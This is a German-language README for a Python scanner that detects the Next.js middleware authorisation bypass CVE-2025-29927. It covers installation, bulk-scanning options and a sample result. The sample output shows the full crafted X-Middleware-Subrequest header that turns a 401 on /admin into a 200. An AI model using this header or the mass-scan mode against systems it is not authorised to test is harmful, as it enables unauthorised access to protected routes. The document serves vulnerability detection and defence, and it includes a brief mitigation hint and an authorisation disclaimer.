
Next.js-Middleware-Bypass-Scanner
CVE-2025-29927 ist ein spezielles Sicherheitstool zur Erkennung der Next.js-Middleware-Bypass-Schwachstelle (CVE-2025-29927), die die Next.js-Versionen 11.1.4 bis 15.2.2 betrifft. Diese kritische Schwachstelle ermöglicht es Angreifern, Sicherheitskontrollen zu umgehen, indem sie einen speziell gestalteten HTTP-Header senden.
Die Next.js-Middleware-Bypass-Schwachstelle (CVE-2025-29927) erlaubt es Angreifern, Autorisierungskontrollen zu umgehen, indem sie einen bösartigen X-Middleware-Subrequest-Header senden, der die Middleware-Verarbeitungslogik verwirrt. Dies kann zu unbefugtem Zugriff auf geschützte Ressourcen und Routen führen.
CVSS-Score: 9.1 (Kritisch)
# Repository klonen
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Abhängigkeiten installieren
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: Ein einzelnes zu scannendes Ziel (z. B. example.com oder https://example.com)-f, --file: Datei mit einer Liste der Ziele (ein Ziel pro Zeile)-c, --concurrency: Anzahl der gleichzeitigen Scans (Standard: 5)-k, --insecure: SSL-Zertifikatsprüfung deaktivieren (nützlich für IP-Adressen)-s, --silent: Lautloser Modus – nur verwundbare Ziele anzeigenEin einzelnes Ziel scannen:
python CVE-2025-29927.py -t example.com
Mehrere Ziele aus einer Datei scannen:
python CVE-2025-29927.py -f targets.txt
Scannen mit deaktivierter SSL-Prüfung:
python CVE-2025-29927.py -t 192.168.1.1 -k
Automatisiertes Scannen im lautlosen Modus:
python CVE-2025-29927.py -f targets.txt -k -s
Scannen mit einem benutzerdefinierten Header:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
Bei verwundbaren Zielen zeigt MiddleWay Folgendes an:
Beispielausgabe:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Um diese Schwachstelle zu entschärfen:
X-Middleware-Subrequest-Header auf Ihrer WAF oder ServerebeneDieses Tool wird nur zu Sicherheitsforschungs- und Verteidigungszwecken bereitgestellt. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Systeme scannen, die Ihnen nicht gehören. Die Autoren übernehmen keine Verantwortung für Missbrauch dieses Tools.
MIT